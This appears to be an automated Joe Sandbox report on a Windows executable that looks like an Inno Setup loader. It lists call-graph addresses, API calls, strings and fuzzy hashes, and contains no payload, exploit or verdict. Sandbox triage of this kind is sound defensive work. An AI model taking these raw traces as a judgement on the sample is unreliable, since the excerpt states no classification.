5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 
6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A15CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A15CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 
6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 
6182->6164 6184 40357c 6183->6184 6185 4035a0 6184->6185 6189 4035d0 6184->6189 6190 40359b 6184->6190 6192 4035b6 6184->6192 6186 4035b1 6185->6186 6187 4035b8 6185->6187 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6185 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A15CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API 
calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 
6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2441996862-0
                                                                                            • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                            • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                            • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                            • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                            • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                            • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                            • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02127C50), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                            • SetWindowLongA.USER32(00010440,000000FC,00409918), ref: 0040A148
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                            • 73A15CF0.USER32(00010440,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3341979996-3001827809
                                                                                            • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                            • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                            • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                            • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                            • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                            • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                            • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                            • SetWindowLongA.USER32(00010440,000000FC,00409918), ref: 0040A148
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                              • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                              • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90), ref: 00409A5C
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                            • 73A15CF0.USER32(00010440,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 978128352-3001827809
                                                                                            • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                            • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                            • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                            • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000), ref: 00409A28
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90), ref: 00409A5C
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02127C50), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                            • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                            • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                            • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                            • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                            • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                            • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                            • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                            • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                            • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
